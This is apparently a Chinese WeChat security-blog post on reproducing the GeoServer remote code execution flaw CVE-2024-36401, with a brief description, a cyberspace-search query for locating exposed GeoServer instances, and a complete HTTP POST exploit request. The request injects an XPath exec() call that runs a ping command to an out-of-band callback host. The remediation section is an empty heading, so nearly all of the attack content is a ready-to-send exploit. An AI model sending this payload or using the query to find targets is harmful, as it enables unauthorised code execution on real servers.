本文内容已进行多层信息处理以确保安全。请注意,使用本公众号提供的任何信息所引发的任何后果,包括直接或间接的损失,均由使用者自行承担。我们强烈建议不要利用文中技术从事非法活动。如发现侵权问题,请及时告知以便我们删除相关内容。如需联系我们,请在公众号内点击“联系客服”按钮,感谢您的理解与合作。
0x01漏洞名称
任意用户可以通过构造恶意OGC请求,在默认安装的服务器中执行XPath表达式,进而利用执行Apache Commons Jxpath提供的功能执行任意代码。
0x03影响范围
GeoServer
0x04 网络空间测绘查询
app="GeoServer"
POST /geoserver/wfs HTTP/1.1 Host: 11.11.11.11 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14) AppleWebKit/616.19.3 (KHTML, like Gecko) Version/17.6.11 Safari/616.19.3 Connection: close Content-Length: 365 Content-Type: application/xml Accept-Encoding: gzip, deflate <wfs:GetPropertyValue service='WFS' version='2.0.0' xmlns:topp='http://www.openplans.org/topp' xmlns:fes='http://www.opengis.net/fes/2.0' xmlns:wfs='http://www.opengis.net/wfs/2.0'> <wfs:Query typeNames='topp:states'/> <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'ping k7ujpoo2.eyes.sh')</wfs:valueReference> </wfs:GetPropertyValue>
0x07修复建议
原文始发于微信公众号(网安探索队):Geoserver远程代码执行漏洞(CVE-2024-36401)【漏洞复现】
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论